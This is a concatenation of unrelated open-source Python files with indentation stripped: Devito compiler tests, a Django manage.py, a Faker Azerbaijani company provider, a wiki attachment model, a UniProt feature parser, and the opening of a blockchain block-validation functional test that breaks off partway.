# 0 --- 0 --- 0 --- 0
radius = 1
indices = [(i, i+radius) for i in sf._coordinate_indices]
bounds = [i.symbolic_size - radius for i in grid.dimensions]
eqs = []
for e, i in enumerate(product(*indices)):
args = [j > 0 for j in i]
args.extend([j < k for j, k in zip(i, bounds)])
condition = And(*args, evaluate=False)
cd = ConditionalDimension('sfc%d' % e, parent=sd, condition=condition)
index = [time] + list(i)
eqs.append(Eq(f[index], f[index] + sf[cd]))
op = Operator(eqs)
op.apply(time=0)
assert np.all(f.data[0, 1:-1, 1:-1] == 1.)
assert np.all(f.data[0, 0] == 0.)
assert np.all(f.data[0, -1] == 0.)
assert np.all(f.data[0, :, 0] == 0.)
assert np.all(f.data[0, :, -1] == 0.)
def test_symbolic_factor(self):
"""
Test ConditionalDimension with symbolic factor (provided as a Constant).
"""
g = Grid(shape=(4, 4, 4))
u = TimeFunction(name='u', grid=g, time_order=0)
fact = Constant(name='fact', dtype=np.int32, value=4)
tsub = ConditionalDimension(name='tsub', parent=g.time_dim, factor=fact)
usave = TimeFunction(name='usave', grid=g, time_dim=tsub, save=4)
op = Operator([Eq(u, u + 1), Eq(usave, u)])
op.apply(time=7) # Use `fact`'s default value, 4
assert np.all(usave.data[0] == 1)
assert np.all(usave.data[1] == 5)
u.data[:] = 0.
op.apply(time=7, fact=2)
assert np.all(usave.data[0] == 1)
assert np.all(usave.data[1] == 3)
assert np.all(usave.data[2] == 5)
assert np.all(usave.data[3] == 7)
def test_implicit_dims(self):
"""
Test ConditionalDimension as an implicit dimension for an equation.
"""
# This test makes an Operator that should create a vector of increasing
# integers, but stop incrementing when a certain stop value is reached
shape = (50,)
stop_value = 20
time = Dimension(name='time')
f = TimeFunction(name='f', shape=shape, dimensions=[time])
# The condition to stop incrementing
cond = ConditionalDimension(name='cond',
parent=time, condition=f[time] < stop_value)
eqs = [Eq(f.forward, f), Eq(f.forward, f.forward + 1, implicit_dims=[cond])]
op = Operator(eqs)
op.apply(time_M=shape[0] - 2)
# Make the same calculation in python to assert the result
F = np.zeros(shape[0])
for i in range(shape[0]):
F[i] = i if i < stop_value else stop_value
assert np.all(f.data == F)
def test_grouping(self):
"""
Test that Clusters over the same set of ConditionalDimensions fall within
the same Conditional. This is a follow up to issue #1610.
"""
grid = Grid(shape=(10, 10))
time = grid.time_dim
cond = ConditionalDimension(name='cond', parent=time, condition=time < 5)
u = TimeFunction(name='u', grid=grid, space_order=4)
# We use a SubDomain only to keep the two Eqs separated
eqns = [Eq(u.forward, u + 1, subdomain=grid.interior),
Eq(u.forward, u.dx.dx + 1., implicit_dims=[cond])]
op = Operator(eqns, opt=('advanced-fsg', {'cire-mincost-sops': 1}))
conds = FindNodes(Conditional).visit(op)
assert len(conds) == 1
assert len(retrieve_iteration_tree(conds[0].then_body)) == 2
def test_stepping_dim_in_condition_lowering(self):
"""
Check that the compiler performs lowering on conditions
with TimeDimensions and generates the expected code::
if (g[t][x + 1][y + 1] <= 10){ if (g[t0][x + 1][y + 1] <= 10){
... --> ...
} }
This test increments a function by one at every timestep until it is
less-or-equal to 10 (g<=10) while although operator runs for 13 timesteps.
"""
grid = Grid(shape=(4, 4))
_, y = grid.dimensions
ths = 10
g = TimeFunction(name='g', grid=grid)
ci = ConditionalDimension(name='ci', parent=y, condition=Le(g, ths))
op = Operator(Eq(g.forward, g + 1, implicit_dims=ci))
op.apply(time_M=ths+3)
assert np.all(g.data[0, :, :] == ths)
assert np.all(g.data[1, :, :] == ths + 1)
assert 'if (g[t0][x + 1][y + 1] <= 10)\n'
'{\n g[t1][x + 1][y + 1] = g[t0][x + 1][y + 1] + 1' in str(op.ccode)
def test_expr_like_lowering(self):
"""
Test the lowering of an expr-like ConditionalDimension's condition.
This test makes an Operator that should indexify and lower the condition
passed in the Conditional Dimension
"""
grid = Grid(shape=(3, 3))
g1 = Function(name='g1', grid=grid)
g2 = Function(name='g2', grid=grid)
g1.data[:] = 0.49
g2.data[:] = 0.49
x, y = grid.dimensions
ci = ConditionalDimension(name='ci', parent=y, condition=Le((g1 + g2),
1.01*(g1 + g2)))
f = Function(name='f', shape=grid.shape, dimensions=(x, ci))
Operator(Eq(f, g1+g2)).apply()
assert np.all(f.data[:] == g1.data[:] + g2.data[:])
@pytest.mark.parametrize('setup_rel, rhs, c1, c2, c3, c4', [
# Relation, RHS, c1 to c4 used as indexes in assert
(Lt, 3, 2, 4, 4, -1), (Le, 2, 2, 4, 4, -1), (Ge, 3, 4, 6, 1, 4),
(Gt, 2, 4, 6, 1, 4), (Ne, 5, 2, 6, 1, 2)
])
def test_relational_classes(self, setup_rel, rhs, c1, c2, c3, c4):
"""
Test ConditionalDimension using conditions based on Relations over SubDomains.
"""
class InnerDomain(SubDomain):
name = 'inner'
def define(self, dimensions):
return {d: ('middle', 2, 2) for d in dimensions}
inner_domain = InnerDomain()
grid = Grid(shape=(8, 8), subdomains=(inner_domain,))
g = Function(name='g', grid=grid)
g2 = Function(name='g2', grid=grid)
for i in [g, g2]:
i.data[:4, :4] = 1
i.data[4:, :4] = 2
i.data[4:, 4:] = 3
i.data[:4, 4:] = 4
xi, yi = grid.subdomains['inner'].dimensions
cond = setup_rel(0.25*g + 0.75*g2, rhs, subdomain=grid.subdomains['inner'])
ci = ConditionalDimension(name='ci', parent=yi, condition=cond)
f = Function(name='f', shape=grid.shape, dimensions=(xi, ci))
eq1 = Eq(f, 0.4*g + 0.6*g2)
eq2 = Eq(f, 5)
Operator([eq1, eq2]).apply()
assert np.all(f.data[2:6, c1:c2] == 5.)
assert np.all(f.data[:, c3:c4] < 5.)
def test_from_cond_to_param(self):
"""
Test that Functions appearing in the condition of a ConditionalDimension
but not explicitly in an Eq are actually part of the Operator input
(stems from issue #1298).
"""
grid = Grid(shape=(8, 8))
x, y = grid.dimensions
g = Function(name='g', grid=grid)
h = Function(name='h', grid=grid)
ci = ConditionalDimension(name='ci', parent=y, condition=Lt(g, 2 + h))
f = Function(name='f', shape=grid.shape, dimensions=(x, ci))
for _ in range(5):
# issue #1298 was non deterministic
Operator(Eq(f, 5)).apply()
@skipif('device')
def test_no_fusion_simple(self):
"""
If ConditionalDimensions are present, then Clusters must not be fused so
that ultimately Eqs get scheduled to different loop nests.
"""
grid = Grid(shape=(4, 4, 4))
time = grid.time_dim
f = TimeFunction(name='f', grid=grid)
g = Function(name='g', grid=grid)
h = Function(name='h', grid=grid)
# No ConditionalDimensions yet. Will be fused and optimized
eqns = [Eq(f.forward, f + 1),
Eq(h, f + 1),
Eq(g, f + 1)]
op = Operator(eqns)
exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
assert len(exprs) == 4
assert exprs[1].expr.rhs is exprs[0].output
assert exprs[2].expr.rhs is exprs[0].output
assert exprs[3].expr.rhs is exprs[0].output
# Now with a ConditionalDimension. No fusion, no optimization
ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)
eqns = [Eq(f.forward, f + 1),
Eq(h, f + 1),
Eq(g, f + 1, implicit_dims=[ctime])]
op = Operator(eqns)
exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
assert len(exprs) == 3
assert exprs[1].expr.rhs is exprs[0].output
assert exprs[2].expr.rhs is exprs[0].output
exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
assert len(exprs) == 1
@skipif('device')
def test_no_fusion_convoluted(self):
"""
Conceptually like `test_no_fusion_simple`, but with more expressions
and non-trivial data flow.
"""
grid = Grid(shape=(4, 4, 4))
time = grid.time_dim
f = TimeFunction(name='f', grid=grid)
g = Function(name='g', grid=grid)
h = Function(name='h', grid=grid)
ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)
eqns = [Eq(f.forward, f + 1),
Eq(h, f + 1),
Eq(g, f + 1, implicit_dims=[ctime]),
Eq(f.forward, f + 1, implicit_dims=[ctime]),
Eq(f.forward, f + 1),
Eq(g, f + 1)]
op = Operator(eqns)
exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
assert len(exprs) == 3
assert exprs[1].expr.rhs is exprs[0].output
assert exprs[2].expr.rhs is exprs[0].output
exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
assert len(exprs) == 3
exprs = FindNodes(Expression).visit(op._func_table['bf2'].root)
assert len(exprs) == 3
assert exprs[1].expr.rhs is exprs[0].output
assert exprs[2].expr.rhs is exprs[0].output
def test_affiness(self):
"""
Test for issue #1616.
"""
nt = 19
grid = Grid(shape=(11, 11))
time = grid.time_dim
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
u = TimeFunction(name='u', grid=grid)
usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
time_dim=time_subsampled)
eqns = [Eq(u.forward, u + 1.), Eq(usave, u)]
op = Operator(eqns)
iterations = [i for i in FindNodes(Iteration).visit(op) if i.dim is not time]
assert all(i.is_Affine for i in iterations)
class TestMashup(object):
"""
Check the correct functioning of the compiler in presence of many Dimension types.
"""
def test_topofusion_w_subdims_conddims(self):
"""
Check that topological fusion works across guarded Clusters over different
iteration spaces and in presence of anti-dependences.
This test uses both SubDimensions (via SubDomains) and ConditionalDimensions.
"""
grid = Grid(shape=(4, 4, 4))
time = grid.time_dim
f = TimeFunction(name='f', grid=grid, time_order=2)
g = TimeFunction(name='g', grid=grid, time_order=2)
h = TimeFunction(name='h', grid=grid, time_order=2)
fsave = TimeFunction(name='fsave', grid=grid, time_order=2, save=5)
gsave = TimeFunction(name='gsave', grid=grid, time_order=2, save=5)
ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)
eqns = [Eq(f.forward, f + 1),
Eq(g.forward, g + 1),
Eq(fsave, f.dt2, implicit_dims=[ctime]),
Eq(h, f + g, subdomain=grid.interior),
Eq(gsave, g.dt2, implicit_dims=[ctime])]
op = Operator(eqns)
# Check generated code -- expect the gsave equation to be scheduled together
# in the same loop nest with the fsave equation
assert len(op._func_table) == 3
exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
assert len(exprs) == 2
assert exprs[0].write is f
assert exprs[1].write is g
exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
assert len(exprs) == 3
assert exprs[1].write is fsave
assert exprs[2].write is gsave
exprs = FindNodes(Expression).visit(op._func_table['bf2'].root)
assert len(exprs) == 1
assert exprs[0].write is h
def test_topofusion_w_subdims_conddims_v2(self):
"""
Like `test_topofusion_w_subdims_conddims` but with more SubDomains,
so we expect fewer loop nests.
"""
grid = Grid(shape=(4, 4, 4))
time = grid.time_dim
f = TimeFunction(name='f', grid=grid, time_order=2)
g = TimeFunction(name='g', grid=grid, time_order=2)
h = TimeFunction(name='h', grid=grid, time_order=2)
fsave = TimeFunction(name='fsave', grid=grid, time_order=2, save=5)
gsave = TimeFunction(name='gsave', grid=grid, time_order=2, save=5)
ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)
eqns = [Eq(f.forward, f + 1, subdomain=grid.interior),
Eq(g.forward, g + 1, subdomain=grid.interior),
Eq(fsave, f.dt2, implicit_dims=[ctime]),
Eq(h, f + g, subdomain=grid.interior),
Eq(gsave, g.dt2, implicit_dims=[ctime])]
op = Operator(eqns)
# Check generated code -- expect the gsave equation to be scheduled together
# in the same loop nest with the fsave equation
assert len(op._func_table) == 2
assert len(FindNodes(Expression).visit(op._func_table['bf0'].root)) == 3
assert len(FindNodes(Expression).visit(op._func_table['bf1'].root)) == 2 + 1 # r0
def test_topofusion_w_subdims_conddims_v3(self):
"""
Like `test_topofusion_w_subdims_conddims_v2` but with an extra anti-dependence,
which causes scheduling over more loop nests.
"""
grid = Grid(shape=(4, 4, 4))
time = grid.time_dim
f = TimeFunction(name='f', grid=grid, time_order=2)
g = TimeFunction(name='g', grid=grid, time_order=2)
h = TimeFunction(name='h', grid=grid, time_order=2)
fsave = TimeFunction(name='fsave', grid=grid, time_order=2, save=5)
gsave = TimeFunction(name='gsave', grid=grid, time_order=2, save=5)
ctime = ConditionalDimension(name='ctime', parent=time, condition=time > 4)
eqns = [Eq(f.forward, f + 1, subdomain=grid.interior),
Eq(g.forward, g + 1, subdomain=grid.interior),
Eq(fsave, f.dt2, implicit_dims=[ctime]),
Eq(h, f.dt2.dx + g, subdomain=grid.interior),
Eq(gsave, g.dt2, implicit_dims=[ctime])]
op = Operator(eqns)
# Check generated code -- expect the gsave equation to be scheduled together
# in the same loop nest with the fsave equation
assert len(op._func_table) == 3
exprs = FindNodes(Expression).visit(op._func_table['bf0'].root)
assert len(exprs) == 2
assert exprs[0].write is f
assert exprs[1].write is g
exprs = FindNodes(Expression).visit(op._func_table['bf1'].root)
assert len(exprs) == 3
assert exprs[1].write is fsave
assert exprs[2].write is gsave
exprs = FindNodes(Expression).visit(op._func_table['bf2'].root)
assert len(exprs) == 2
assert exprs[1].write is h
|
MoonCheesez/stack
|
PiGame/pigame/manage.py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pigame.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
joke2k/faker
|
faker/providers/company/az_AZ/__init__.py
|
from .. import Provider as CompanyProvider
class Provider(CompanyProvider):
formats = (
"{{last_name}} {{company_suffix}}",
"{{last_name}} {{last_name}} {{company_suffix}}",
"{{large_company}}",
)
large_companies = (
"AZAL",
"Azergold",
"SOCAR",
"Socar Polymer",
"Global Export Fruits",
"Baku Steel Company",
"Azersun",
"Sun Food",
"Azərbaycan Şəkər İstehsalat Birliyi",
"Azərsu",
"Xəzər Dəniz Gəmiçiliyi",
"Azərenerji",
"Bakıelektrikşəbəkə",
"Azəralüminium",
"Bravo",
"Azərpambıq Aqrar Sənaye Kompleksi",
"CTS-Agro",
"Azərtütün Aqrar Sənaye Kompleksi",
"Azəripək",
"Azfruittrade",
"AF Holding",
"Azinko Holding",
"Gilan Holding",
"Azpetrol",
"Azərtexnolayn",
"Bakı Gəmiqayırma Zavodu",
"Gəncə Tekstil Fabriki",
"Mətanət A",
"İrşad Electronics",
)
company_suffixes = (
"ASC",
"QSC",
"MMC",
)
def large_company(self):
"""
:example: 'SOCAR'
"""
return self.random_element(self.large_companies)
|
indexofire/gork
|
src/gork/application/know/plugins/attachments/models.py
|
# -*- coding: utf-8 -*-
import os.path
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.conf import settings as django_settings
from django.db.models import signals
from know.plugins.attachments import settings
from know import managers
from know.models.pluginbase import ReusablePlugin
from know.models.article import BaseRevisionMixin
class IllegalFileExtension(Exception):
"""File extension on upload is not allowed"""
pass
class Attachment(ReusablePlugin):
objects = managers.ArticleFkManager()
current_revision = models.OneToOneField(
'AttachmentRevision',
verbose_name=_(u'current revision'),
blank=True,
null=True,
related_name='current_set',
help_text=_(u'The revision of this attachment currently in use (on all articles using the attachment)'),
)
original_filename = models.CharField(
max_length=256,
verbose_name=_(u'original filename'),
blank=True,
null=True,
)
def can_write(self, **kwargs):
user = kwargs.get('user', None)
if not settings.ANONYMOUS and (not user or user.is_anonymous()):
return False
return ReusablePlugin.can_write(self, **kwargs)
def can_delete(self, user):
return self.can_write(user=user)
class Meta:
verbose_name = _(u'attachment')
verbose_name_plural = _(u'attachments')
app_label = settings.APP_LABEL
def __unicode__(self):
return "%s: %s" % (self.article.current_revision.title, self.original_filename)
def extension_allowed(filename):
try:
extension = filename.split(".")[-1]
except IndexError:
# No extension
raise IllegalFileExtension("No file extension found in filename. That's not okay!")
if not extension.lower() in map(lambda x: x.lower(), settings.FILE_EXTENSIONS):
raise IllegalFileExtension("The following filename is illegal: %s. Extension has to be one of %s" %
(filename, ", ".join(settings.FILE_EXTENSIONS)))
return extension
def upload_path(instance, filename):
from os import path
extension = extension_allowed(filename)
# Has to match original extension filename
if instance.id and instance.attachment and instance.attachment.original_filename:
original_extension = instance.attachment.original_filename.split(".")[-1]
if not extension.lower() == original_extension:
raise IllegalFileExtension("File extension has to be '%s', not '%s'." %
(original_extension, extension.lower()))
elif instance.attachment:
instance.attachment.original_filename = filename
upload_path = settings.UPLOAD_PATH
upload_path = upload_path.replace('%aid', str(instance.attachment.article.id))
if settings.UPLOAD_PATH_OBSCURIFY:
import random
import hashlib
m = hashlib.md5(str(random.randint(0, 100000000000000)))
upload_path = path.join(upload_path, m.hexdigest())
if settings.APPEND_EXTENSION:
filename += '.upload'
return path.join(upload_path, filename)
class AttachmentRevision(BaseRevisionMixin, models.Model):
attachment = models.ForeignKey('Attachment')
file = models.FileField(
upload_to=upload_path,
max_length=255,
verbose_name=_(u'file'),
storage=settings.STORAGE_BACKEND,
)
description = models.TextField(
blank=True,
)
class Meta:
verbose_name = _(u'attachment revision')
verbose_name_plural = _(u'attachment revisions')
ordering = ('created',)
get_latest_by = ('revision_number',)
app_label = settings.APP_LABEL
def get_filename(self):
"""Used to retrieve the filename of a revision.
But attachment.original_filename should always be used in the frontend
such that filenames stay consistent."""
# TODO: Perhaps we can let file names change when files are replaced?
if not self.file:
return None
filename = self.file.name.split("/")[-1]
return ".".join(filename.split(".")[:-1])
def get_size(self):
"""Used to retrieve the file size and not cause exceptions."""
try:
return self.file.size
except OSError:
return None
except ValueError:
return None
def save(self, *args, **kwargs):
if (not self.id and
not self.previous_revision and
self.attachment and
self.attachment.current_revision and
self.attachment.current_revision != self):
self.previous_revision = self.attachment.current_revision
if not self.revision_number:
try:
previous_revision = self.attachment.attachmentrevision_set.latest()
self.revision_number = previous_revision.revision_number + 1
# NB! The above should not raise the below exception, but somehow it does.
except AttachmentRevision.DoesNotExist, Attachment.DoesNotExist:
self.revision_number = 1
super(AttachmentRevision, self).save(*args, **kwargs)
if not self.attachment.current_revision:
# If I'm saved from Django admin, then article.current_revision is me!
self.attachment.current_revision = self
self.attachment.save()
def __unicode__(self):
return "%s: %s (r%d)" % (self.attachment.article.current_revision.title,
self.attachment.original_filename,
self.revision_number)
def on_revision_delete(instance, *args, **kwargs):
if not instance.file:
return
# Remove file
path = instance.file.path.split("/")[:-1]
instance.file.delete(save=False)
# Clean up empty directories
# Check for empty folders in the path. Delete the first two.
if len(path[-1]) == 32:
# Path was (most likely) obscurified so we should look 2 levels down
max_depth = 2
else:
max_depth = 1
for depth in range(0, max_depth):
delete_path = "/".join(path[:-depth] if depth > 0 else path)
try:
if len(os.listdir(os.path.join(django_settings.MEDIA_ROOT, delete_path))) == 0:
os.rmdir(delete_path)
except OSError:
# Raised by os.listdir if directory is missing
pass
signals.pre_delete.connect(on_revision_delete, AttachmentRevision)
|
wonjunetai/pulse
|
features/uniprot_core.py
|
# reads uniprot core file and generates core features
from features_helpers import score_differences
def build_uniprot_to_index_to_core(sable_db_obj):
uniprot_to_index_to_core = {}
for line in sable_db_obj:
tokens = line.split()
try:
# PARSING ID
prot = tokens[0]
index = int(tokens[1])
core = tokens[2]
# PARSING ID
if uniprot_to_index_to_core.has_key(prot):
uniprot_to_index_to_core[prot][index] = core
else:
uniprot_to_index_to_core[prot] = {index: core}
except ValueError:
print "Cannot parse: " + line[0:len(line) - 1]
return uniprot_to_index_to_core
def get_sable_scores(map_file, f_sable_db_location, uniprot_core_output_location):
map_file_obj = open(map_file, 'r')
sable_db_obj = open(f_sable_db_location, 'r')
write_to = open(uniprot_core_output_location, 'w')
uniprot_to_index_to_core = build_uniprot_to_index_to_core(sable_db_obj)
for line in map_file_obj:
tokens = line.split()
asid = tokens[0].split("_")[0]
prot = tokens[1]
sstart = int(tokens[2])
start = int(tokens[3])
end = int(tokens[4])
eend = int(tokens[5])
rough_a_length = int(int(tokens[0].split("_")[-1].split("=")[1]) / 3)
if asid[0] == "I":
rough_a_length = 0
c1_count = 0
a_count = 0
c2_count = 0
canonical_absolute = 0
if prot in uniprot_to_index_to_core:
c1_count = score_differences(uniprot_to_index_to_core, prot, sstart, start)
a_count = score_differences(uniprot_to_index_to_core, prot, start, end)
c2_count = score_differences(uniprot_to_index_to_core, prot, end, eend)
prot_len = int(line.split("\t")[7].strip())
canonical_absolute = score_differences(uniprot_to_index_to_core, prot, 1, prot_len)
print >> write_to, tokens[0] + "\t" + prot + "\t" + repr(c1_count) + "\t" + repr(a_count) + "\t" + repr(
c2_count) + "\t" + repr(canonical_absolute)
write_to.close()
|
Bushstar/UFO-Project
|
test/functional/feature_block.py
|
#!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test block processing."""
import copy
import struct
import time
from test_framework.blocktools import create_block, create_coinbase, create_tx_with_script, get_legacy_sigopcount_block
from test_framework.key import CECKey
from test_framework.messages import (
CBlock,
COIN,
COutPoint,
CTransaction,
CTxIn,
CTxOut,
MAX_BLOCK_BASE_SIZE,
uint256_from_compact,
uint256_from_str,
)
from test_framework.mininode import P2PDataStore
from test_framework.script import (
CScript,
MAX_SCRIPT_ELEMENT_SIZE,
OP_2DUP,
OP_CHECKMULTISIG,
OP_CHECKMULTISIGVERIFY,
OP_CHECKSIG,
OP_CHECKSIGVERIFY,
OP_ELSE,
OP_ENDIF,
OP_EQUAL,
OP_DROP,
OP_FALSE,
OP_HASH160,
OP_IF,
OP_INVALIDOPCODE,
OP_RETURN,
OP_TRUE,
SIGHASH_ALL,
SignatureHash,
hash160,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
MAX_BLOCK_SIGOPS = 20000
# Use this class for tests that require behavior other than normal "mininode" behavior.
# For now, it is used to serialize a bloated varint (b64).
class CBrokenBlock(CBlock):
def initialize(self, base_block):
self.vtx = copy.deepcopy(base_block.vtx)
self.hashMerkleRoot = self.calc_merkle_root()
def serialize(self, with_witness=False):
r = b""
r += super(CBlock, self).serialize()
r += struct.pack("<BQ", 255, len(self.vtx))
for tx in self.vtx:
if with_witness:
r += tx.serialize_with_witness()
else:
r += tx.serialize_without_witness()
return r
def normal_serialize(self):
return super().serialize()
class FullBlockTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.extra_args = [[]]
def run_test(self):
node = self.nodes[0] # convenience reference to the node
self.bootstrap_p2p() # Add one p2p connection to the node
self.block_heights = {}
self.coinbase_key = CECKey()
self.coinbase_key.set_secretbytes(b"horsebattery")
self.coinbase_pubkey = self.coinbase_key.get_pubkey()
self.tip = None
self.blocks = {}
self.genesis_hash = int(self.nodes[0].getbestblockhash(), 16)
self.block_heights[self.genesis_hash] = 0
self.spendable_outputs = []
# Create a new block
b0 = self.next_block(0)
self.save_spendable_output()
self.sync_blocks([b0])
# Allow the block to mature
blocks = []
for i in range(99):
blocks.append(self.next_block(5000 + i))
self.save_spendable_output()
self.sync_blocks(blocks)
# collect spendable outputs now to avoid cluttering the code later on
out = []
for i in range(33):
out.append(self.get_spendable_output())
# Start by building a couple of blocks on top (which output is spent is
# in parentheses):
# genesis -> b1 (0) -> b2 (1)
b1 = self.next_block(1, spend=out[0])
self.save_spendable_output()
b2 = self.next_block(2, spend=out[1])
self.save_spendable_output()
self.sync_blocks([b1, b2])
# Fork like this:
#
# genesis -> b1 (0) -> b2 (1)
# \-> b3 (1)
#
# Nothing should happen at this point. We saw b2 first so it takes priority.
self.log.info("Don't reorg to a chain of the same length")
self.move_tip(1)
b3 = self.next_block(3, spend=out[1])
txout_b3 = b3.vtx[1]
self.sync_blocks([b3], False)
# Now we add another block to make the alternative chain longer.
#
# genesis -> b1 (0) -> b2 (1)
# \-> b3 (1) -> b4 (2)
self.log.info("Reorg to a longer chain")
b4 = self.next_block(4, spend=out[2])
self.sync_blocks([b4])
# ... and back to the first chain.
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b3 (1) -> b4 (2)
self.move_tip(2)
b5 = self.next_block(5, spend=out[2])
self.save_spendable_output()
self.sync_blocks([b5], False)
self.log.info("Reorg back to the original chain")
b6 = self.next_block(6, spend=out[3])
self.sync_blocks([b6], True)
# Try to create a fork that double-spends
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b7 (2) -> b8 (4)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a chain with a double spend, even if it is longer")
self.move_tip(5)
b7 = self.next_block(7, spend=out[2])
self.sync_blocks([b7], False)
b8 = self.next_block(8, spend=out[4])
self.sync_blocks([b8], False, reconnect=True)
# Try to create a block that has too much fee
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b9 (4)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block where the miner creates too much coinbase reward")
self.move_tip(6)
b9 = self.next_block(9, spend=out[4], additional_coinbase_value=1)
self.sync_blocks([b9], False, 16, b'bad-cb-amount', reconnect=True)
# Create a fork that ends in a block with too much fee (the one that causes the reorg)
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b10 (3) -> b11 (4)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a chain where the miner creates too much coinbase reward, even if the chain is longer")
self.move_tip(5)
b10 = self.next_block(10, spend=out[3])
self.sync_blocks([b10], False)
b11 = self.next_block(11, spend=out[4], additional_coinbase_value=1)
self.sync_blocks([b11], False, 16, b'bad-cb-amount', reconnect=True)
# Try again, but with a valid fork first
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b14 (5)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a chain where the miner creates too much coinbase reward, even if the chain is longer (on a forked chain)")
self.move_tip(5)
b12 = self.next_block(12, spend=out[3])
self.save_spendable_output()
b13 = self.next_block(13, spend=out[4])
self.save_spendable_output()
b14 = self.next_block(14, spend=out[5], additional_coinbase_value=1)
self.sync_blocks([b12, b13, b14], False, 16, b'bad-cb-amount', reconnect=True)
# New tip should be b13.
assert_equal(node.getbestblockhash(), b13.hash)
# Add a block with MAX_BLOCK_SIGOPS and one with one more sigop
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b16 (6)
# \-> b3 (1) -> b4 (2)
self.log.info("Accept a block with lots of checksigs")
lots_of_checksigs = CScript([OP_CHECKSIG] * (MAX_BLOCK_SIGOPS - 1))
self.move_tip(13)
b15 = self.next_block(15, spend=out[5], script=lots_of_checksigs)
self.save_spendable_output()
self.sync_blocks([b15], True)
self.log.info("Reject a block with too many checksigs")
too_many_checksigs = CScript([OP_CHECKSIG] * (MAX_BLOCK_SIGOPS))
b16 = self.next_block(16, spend=out[6], script=too_many_checksigs)
self.sync_blocks([b16], False, 16, b'bad-blk-sigops', reconnect=True)
# Attempt to spend a transaction created on a different fork
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b17 (b3.vtx[1])
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block with a spend from a re-org'ed out tx")
self.move_tip(15)
b17 = self.next_block(17, spend=txout_b3)
self.sync_blocks([b17], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# Attempt to spend a transaction created on a different fork (on a fork this time)
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5)
# \-> b18 (b3.vtx[1]) -> b19 (6)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block with a spend from a re-org'ed out tx (on a forked chain)")
self.move_tip(13)
b18 = self.next_block(18, spend=txout_b3)
self.sync_blocks([b18], False)
b19 = self.next_block(19, spend=out[6])
self.sync_blocks([b19], False, 16, b'bad-txns-inputs-missingorspent', reconnect=True)
# Attempt to spend a coinbase at depth too low
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b20 (7)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block spending an immature coinbase.")
self.move_tip(15)
b20 = self.next_block(20, spend=out[7])
self.sync_blocks([b20], False, 16, b'bad-txns-premature-spend-of-coinbase')
# Attempt to spend a coinbase at depth too low (on a fork this time)
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5)
# \-> b21 (6) -> b22 (5)
# \-> b3 (1) -> b4 (2)
self.log.info("Reject a block spending an immature coinbase (on a forked chain)")
self.move_tip(13)
b21 = self.next_block(21, spend=out[6])
self.sync_blocks([b21], False)
b22 = self.next_block(22, spend=out[5])
self.sync_blocks([b22], False, 16, b'bad-txns-premature-spend-of-coinbase')
# Create a block on either side of MAX_BLOCK_BASE_SIZE and make sure its accepted/rejected
# genesis -> b1 (0) -> b2 (1) -> b5 (2) -> b6 (3)
# \-> b12 (3) -> b13 (4) -> b15 (5) -> b23 (6)
# \-> b24 (6) -> b25 (7)
# \-> b3 (1) -> b4 (2)
self.log.info("Accept a block of size MAX_BLOCK_BASE_SIZE")
self.move_tip(15)
b23 = self.next_block(23, spend=out[6])
tx = CTransaction()
script_length = MAX_BLOCK_BASE_SIZE - len(b23.serialize()) - 69
script_output = CScript([b'\x00' * script_length])
tx.vout.append(CTxOut(0, script_output))
tx.vin.append(CTxIn(COutPoint(b23.vtx[1].sha256, 0)))
b23 = self.update_block(23, [tx])
# Make sure the math above worked out to produce a max-sized block
assert_equal(len(b23.serialize()), MAX_BLOCK_BASE_SIZE)
self.sync_blocks([b23], True)
self.save_spendable_output()
self.log.info("Reject a block of size MAX_BLOCK_BASE_SIZE + 1")
self.move_tip(15)
